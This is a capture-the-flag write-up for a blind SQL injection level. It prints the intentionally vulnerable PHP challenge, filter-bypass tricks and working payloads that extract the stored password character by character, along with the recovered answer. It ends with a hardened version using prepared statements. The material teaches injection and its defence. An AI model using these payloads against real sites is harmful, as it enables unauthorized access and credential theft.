<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem");
highlight_file(__FILE__);
?>
A blind SQL injection challenge.
There are several filters.
Bypasses:
and filter -> &&
or filter -> ||
= filter -> in(), like
+ for reference, the URL-encoded values (& and | are special characters in a query string, so they must be percent-encoded):
&& -> %26%26
|| -> %7C%7C
query : select id from prob_golem where id='guest' and pw='123' || id in('admin') && length(pw) like 8&& '1'
-> true
The password is 8 characters long.
query : select id from prob_golem where id='guest' and pw='123' || id in('admin') && ascii(right(left(pw,i),1)) like j && '1'
Changing i = 1~8 and j over the ASCII character values recovers the whole password. (I ran a program for this.)
query : select id from prob_golem where id='guest' and pw='77d6290b'
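As an added example (not the LOS challenge code), the same two lookups rewritten so that the pw parameter can never become part of the SQL text. The challenge's blocklist regex fails because every blocked token has an equivalent the regex does not cover (&&, ||, in(), like); a prepared statement removes the problem class instead of chasing tokens. It assumes config.php still provides dbconnect(), login_chk() and solve() as in the challenge, and that mysqli uses mysqlnd so get_result() is available. It also stops echoing the query, which in the original hands the attacker a ready-made oracle for each guess.

```php
<?php
// Added example, not the original LOS code: hardened version of the golem lookup.
// Assumes config.php provides login_chk(), dbconnect() and solve() as in the challenge.
include "./config.php";
login_chk();
$db = dbconnect();

$pw = $_GET['pw'] ?? '';

// Stage 1: the "guest" lookup. The query template and the value travel
// separately, so ||, &&, in() and like inside $pw are just bytes in a string
// literal. No token blocklist is needed, and the query is not echoed back.
$stmt = $db->prepare("SELECT id FROM prob_golem WHERE id = 'guest' AND pw = ?");
$stmt->bind_param('s', $pw);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();   // requires mysqlnd (assumption)
$stmt->close();
if ($row) {
    // Escape output so a stored value cannot become HTML/JS in the response.
    echo "<h2>Hello " . htmlspecialchars($row['id'], ENT_QUOTES, 'UTF-8') . "</h2>";
}

// Stage 2: the admin check. Fetch the stored value by id only, never by pw,
// and compare in PHP. hash_equals() is a constant-time comparison, so the
// response time does not depend on how many leading characters match.
$stmt = $db->prepare("SELECT pw FROM prob_golem WHERE id = 'admin'");
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
$stmt->close();
if ($row && hash_equals($row['pw'], $pw)) {
    solve("golem");
}
```

The second query in the original only fed the password through addslashes(), which handles quotes but not the boolean-oracle behaviour the first query already leaks; with both statements parameterized, the length(pw) like 8 and ascii(right(left(pw,i),1)) like j probes above return no row regardless of the stored value.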